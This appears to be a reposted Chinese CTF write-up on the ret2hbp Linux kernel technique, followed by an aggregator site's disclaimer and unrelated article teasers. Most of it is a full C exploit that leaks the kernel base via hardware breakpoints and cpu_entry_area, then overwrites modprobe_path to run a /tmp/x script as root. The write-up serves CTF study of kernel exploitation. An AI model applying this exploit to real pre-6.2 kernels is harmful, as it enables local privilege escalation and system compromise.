【ret2hbp】一道板子测试题 和 SCTF2023 - sycrpg

前言

ret2hbp 主要是利用在内核版本 v6.2.0 之前,cpu_entry_area mapping 区域没有参与随机化的利用。其主要针对的场景如下:

1)存在任意地址读,泄漏内核地址

2)存在无数次任意地址写,泄漏内核地址并提权

这里仅仅记录题目,具体原理请读者自行查阅资料,这里给一些参考链接:

一种借助硬件断点的提权思路分析与演示 板子题也是这个大佬写的

https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html

板子题

保护:smep、smap、kalsr、pti都开了

漏洞如下:无数次任意地址写8字节

exp 如下:这里在泄漏完kernel_offset后直接利用任意写打modprobe_path,这里取巧了

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <poll.h>
#include <sched.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <syscall.h>
#include <unistd.h>void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(5);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf("  %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");}printf("   ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}#define DF_OFFSET(dr) ((void*)(&((struct user*)0)->u_debugreg[dr]))
#define CPU_ENTRY_AREA_DB_STACK_RCX_ADDR 0xfffffe0000010fb0
#define MMAP_ADDR 0x12340000
#define MMAP_SIZE 0x2000
int fd;
int pipe_fd[2];struct arg { uint64_t addr; uint64_t val };void arb_write(uint64_t addr, uint64_t val)
{struct arg arg = { .addr = addr, .val = val };ioctl(fd, 0, &arg);
}void set_hbp(pid_t pid, void* addr)
{if (ptrace(PTRACE_POKEUSER, pid, DF_OFFSET(0), addr))err_exit("ptrace PTRACE_POKEUSER for dr0 in set_hbp");long dr7 = (1<<0)|(1<<8)|(1<<16)|(1<<17)|(1<<18)|(1<<19);if (ptrace(PTRACE_POKEUSER, pid, DF_OFFSET(7), dr7))err_exit("ptrace PTRACE_POKEUSER for dr7 in set_hbp");
}void do_trigger_hbp()
{bind_core(0);if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))err_exit("ptrace PTRACE_TRACEME in do trigger hbp");struct utsname* uts = (struct utsname*)MMAP_ADDR;int oob_idx = (sizeof(struct utsname) + sizeof(uint64_t) - 1) / sizeof(uint64_t);while (1){raise(SIGSTOP);uname(uts);if (((uint64_t*)uts)[oob_idx]){puts("[+] OOB Read Stack Data Successfully");write(pipe_fd[1], MMAP_ADDR, MMAP_SIZE);break;}}}void do_change_cx()
{bind_core(1);puts("[+] write cpu_entry_area DB_STACK -> rcx");while (1){arb_write(CPU_ENTRY_AREA_DB_STACK_RCX_ADDR, 0x400/8);}
}void get_flag(){system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag' > /tmp/x"); // modeprobe_path 修改为了 /tmp/xsystem("chmod +x /tmp/x");system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy"); // 非法格式的二进制文件system("chmod +x /tmp/dummy");system("/tmp/dummy"); // 执行非法格式的二进制文件 ==> 执行 modeprobe_path 指向的文件 /tmp/xsleep(0.3);system("cat /flag");exit(0);
}int main(int argc, char** argv, char** envp)
{fd = open("/dev/vuln", O_RDONLY);if (fd < 0) err_exit("open dev file");if (mmap(MMAP_ADDR, MMAP_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) == MAP_FAILED)err_exit("mmap MMAP_ADDR");pipe(pipe_fd);pid_t pid1, pid2;puts("[+] fork a process to trigger hbp");pid1 = fork();if (!pid1){do_trigger_hbp();exit(0);} else if (pid1 < 0) {err_exit("fork a trigger hbp process");} else {waitpid(pid1, NULL, NULL);}pid2 = fork();if (!pid2){do_change_cx();exit(0);} else if (pid2 < 0) {err_exit("fork a trigger hbp process");}set_hbp(pid1, MMAP_ADDR);struct pollfd fds = { .fd = pipe_fd[0], .events = POLLIN };while (1){if (ptrace(PTRACE_CONT, pid1, NULL, NULL))err_exit("ptrace PTRACE_CONT");waitpid(pid1, NULL, NULL);int res = poll(&fds, 1, 0);if (res > 0 && (fds.revents & POLLIN)){read(pipe_fd[0], MMAP_ADDR, MMAP_SIZE);break;}}binary_dump("OOB READ STACK DTA", MMAP_ADDR+sizeof(struct utsname), 0x100);uint64_t* leak_data = MMAP_ADDR+sizeof(struct utsname);uint64_t kbase = leak_data[4] - 0xe0b32;uint64_t modprobe_path = kbase + 0x1e8b920;hexx("kbase", kbase);hexx("modprobe_path", modprobe_path);char cmd[8] = "/tmp/x";arb_write(modprobe_path, *(uint64_t*)cmd);get_flag();puts("[+] EXP NEVER END!");return 0;
}

效果如下: 

但是在大佬 blog 中是直接可以提权的,所以这里尝试提权,这里其实想法挺多了,因为漏洞的品相比较好,所以可以直接考虑修改 ip / rsp,但是这里还是参考原文中的做法,因为 srcrpg 这题是固定地址的任意次1字节写。

todo 后面补 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/219031.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

HCIA-WLAN V3.0,那些重点要点

HCIA-WLAN V3.0,那些重点要点

一、WLAN各个标准&#xff0c;工作频段&#xff0c;理论速率。 二、OFDM和OFDMA&#xff0c;工作频段&#xff0c;空间流。 三、三种帧类型&#xff1a;管理帧、控制帧、数据帧&#xff0c;CAPWAP报文和端口。 四、帧间间隔&#xff0c;波束成形&#xff0c;信道绑定&#xff0…
阅读更多...
接口测试要测试什么?怎么测?

接口测试要测试什么?怎么测?

本文主要分为两个部分&#xff1a; 第一部分&#xff1a;主要从问题出发&#xff0c;引入接口测试的相关内容并与前端测试进行简单对比&#xff0c;总结两者之前的区别与联系 第二部分&#xff1a;主要介绍为什么要做接口测试&#xff0c;并简单总结接口持续集成和接口质量评估…
阅读更多...
正确看待鸿蒙不兼容Android,这不是趋势?

正确看待鸿蒙不兼容Android,这不是趋势?

华为可能明年推出不兼容安卓的鸿蒙版本。11月20日&#xff0c;据澎湃新闻报道&#xff0c;一华为相关人士表示&#xff0c;推出时间还不确定&#xff0c;未来IOS、鸿蒙、安卓将为三个各自独立的系统。 稍早前据证券时报报道&#xff0c;有业内人士亦表示&#xff1a;“华为内部…
阅读更多...
Re59:读论文 Retrieval-Augmented Generation for Knowledge-Intensive NLP Tasks

Re59:读论文 Retrieval-Augmented Generation for Knowledge-Intensive NLP Tasks

诸神缄默不语-个人CSDN博文目录 诸神缄默不语的论文阅读笔记和分类 论文名称&#xff1a;Retrieval-Augmented Generation for Knowledge-Intensive NLP Tasks 模型开源地址&#xff1a;https://huggingface.co/facebook/rag-token-nq ArXiv下载地址&#xff1a;https://arxi…
阅读更多...
Linux——MySQL数据库的使用

Linux——MySQL数据库的使用

访问MySQL数据库 MySOL数据库系统也是一个典型的C/S&#xff08;客户端/服务器&#xff09;架构的应用&#xff0c;要访问MySOL数据库 需要使用专门的客户端软件&#xff0c;在Linux系统中&#xff0c;最简单、易用的MySQL.客户端软件是其自带的mysql 命令工具。 登录到MySQL服…
阅读更多...
关于Cython生成的so动态链接库逆向

关于Cython生成的so动态链接库逆向

来个引子&#xff1a;TPCTF的maze题目 如何生成这个so文件 为了研究逆向&#xff0c;我们先搞个例子感受一下生成so的整个过程&#xff0c;方便后续分析 创建对应python库文件 testso.py def test_add(a,b):a int(a)b int(b)return a bdef test_calc(li):for i in range…
阅读更多...
逆向思考 C. Fence Painting

逆向思考 C. Fence Painting

Problem - 1481C - Codeforces 思路&#xff1a;逆序考虑&#xff0c;因为每一块木板都是被最后一次粉刷所决定的。 从后往前开始&#xff0c;对于 c i c_i ci​来说&#xff0c; 如果这个颜色还有没有涂的木板&#xff0c;那么涂到其中一个木板即可如果这个颜色下没有未涂的…
阅读更多...
系统思考与啤酒游戏经营沙盘

系统思考与啤酒游戏经营沙盘

结束一家汽车零配件公司《系统思考与啤酒游戏经营沙盘》的内训课&#xff0c;4个小组基本上都有共同的心智模式&#xff0c;这也代表团队有一些集体的盲点。不仅仅对啤酒游戏经营沙盘做了复盘&#xff0c;同时也借用学员画出的系统环路图完成真实案例的研讨以及团队共识&#x…
阅读更多...
从零开始学机器学习,这些学习网站让你事半功倍!

从零开始学机器学习,这些学习网站让你事半功倍!

介绍&#xff1a;机器学习是人工智能&#xff08;AI&#xff09;和计算机科学的一个分支&#xff0c;它专注于使用数据和算法&#xff0c;模仿人类学习的方式&#xff0c;逐步提高自身的准确性。更具体来说&#xff0c;机器学习是一门关于数据学习的科学技术&#xff0c;它能帮…
阅读更多...
功能更新|免费敏捷工具Leangoo领歌私有部署新增第三方身份认证和API对接

功能更新|免费敏捷工具Leangoo领歌私有部署新增第三方身份认证和API对接

Leangoo领歌是一款永久免费的专业的敏捷开发管理工具&#xff0c;提供端到端敏捷研发管理解决方案&#xff0c;涵盖敏捷需求管理、任务协同、进展跟踪、统计度量等。 Leangoo支持敏捷研发管理全流程&#xff0c;包括小型团队敏捷开发&#xff0c;规模化敏捷SAFe&#xff0c;Scr…
阅读更多...
MySQL笔记-第11章_数据处理之增删改

MySQL笔记-第11章_数据处理之增删改

视频链接&#xff1a;【MySQL数据库入门到大牛&#xff0c;mysql安装到优化&#xff0c;百科全书级&#xff0c;全网天花板】 文章目录 第11章_数据处理之增删改1. 插入数据1.1 实际问题1.2 方式1&#xff1a;VALUES的方式添加1.3 方式2&#xff1a;将查询结果插入到表中 2. 更…
阅读更多...
三只松鼠坚持的“高端性价比”,也是零食行业通往未来的门票?

三只松鼠坚持的“高端性价比”,也是零食行业通往未来的门票?

文 | 螳螂观察 作者 | 易不二 没有成功的企业&#xff0c;只有时代的企业。 从全球商业数百年的发展历史来看&#xff0c;一百年间有无数企业演绎了“诞生→发展→巅峰→衰亡”的宿命。即便此间已经走到了世界500强的企业&#xff0c;到现在存活下来的也仅有3%。 时代的潮流…
阅读更多...
2023自动化测试框架大对比:哪个更胜一筹?

2023自动化测试框架大对比:哪个更胜一筹?

所谓工欲善其事&#xff0c;必先利其器&#xff0c;在进行自动化测试时&#xff0c;选择一个合适的框架是至关重要的。因为一个好的测试框架可以大大提高测试效率&#xff0c;减少我们很多工作量。在选择框架之前&#xff0c;我们通常需要对不同的框架进行对比&#xff0c;以便…
阅读更多...
LeetCode:1631. 最小体力消耗路径(SPFA Java)

LeetCode:1631. 最小体力消耗路径(SPFA Java)

目录 1631. 最小体力消耗路径 题目描述&#xff1a; 实现代码与解析&#xff1a; BFSDP 原理思路&#xff1a; 1631. 最小体力消耗路径 题目描述&#xff1a; 你准备参加一场远足活动。给你一个二维 rows x columns 的地图 heights &#xff0c;其中 heights[row][col] 表…
阅读更多...
【后端学前端】第一天 css动画 内凹导航栏

【后端学前端】第一天 css动画 内凹导航栏

1、学习信息 css动画 内凹导航栏_哔哩哔哩_bilibili 随便找的的视频&#xff0c;主要原因是在公司不方便有声音 2、源码 最终源码 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><title>Title</title…
阅读更多...
boost编译静态库

boost编译静态库

版本1_83_0 下载地址https://boostorg.jfrog.io/artifactory/main/release/1.83.0/source/boost_1_83_0.zip 解压后根目录可见 参考方式&#xff1a;打开index.html 可通过此路径找到编译方法 进入getting started&#xff0c;右下角有linux和windows的下一步可选&#xff0…
阅读更多...
美赛F奖经验分享,干货满满,快来查收!

美赛F奖经验分享,干货满满,快来查收!

2023年美赛结果出来之后&#xff0c;陆续有人给我发私信求经验&#xff0c;跟一些同学交流后我发现&#xff0c;很多人其实对美赛了解程度很少。我借此机会介绍一下美赛&#xff0c;并分享一下获奖经验。我的内容主要包括以下几个部分&#xff1a;美赛是什么、得奖分布、选题建…
阅读更多...
redis-学习笔记(Jedis string 简单命令)

redis-学习笔记(Jedis string 简单命令)

mset & mget 批量设置和获取键值对 可以看出,参数都是可变参数 (就是说, 可以写任意个) 代码演示 getrange & setrange 获取和设置 string 类型中 某一区间的值 代码演示 append 往字符串的末尾拼接字符串 代码演示 incr & decr 如果 string 中为数字的话, 可以进行…
阅读更多...
支付系统中日志的具体落地,实现快速发现,快速报警,指标分析

支付系统中日志的具体落地,实现快速发现,快速报警,指标分析

日志规范 V1.0 适用范围&#xff1a;适用于通用服务日志&#xff08;如nginx/redis/mysql日志&#xff09;之外的所有线上落盘日志&#xff0c;包括服务端业务日志&#xff0c;BI日志&#xff0c;移动端APP日志。 实施范围&#xff1a;要求所有新业务模块以及深度重构的模块实…
阅读更多...
Servlet 的初步学习

Servlet 的初步学习

前言 咱们最核心的目标是基于tomcat编程, 做出网站来 ~~ 基于tomcat进行网站后端的开发. 网站后端, http服务器,肯定是需要针对http 协议进行一系列操作的. 幸运的是, tomcat,已经把这些http相关的底层操作,封装好了只需要调用tomcat给咱们提供的api即可 Servlet 是什么 Servl…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023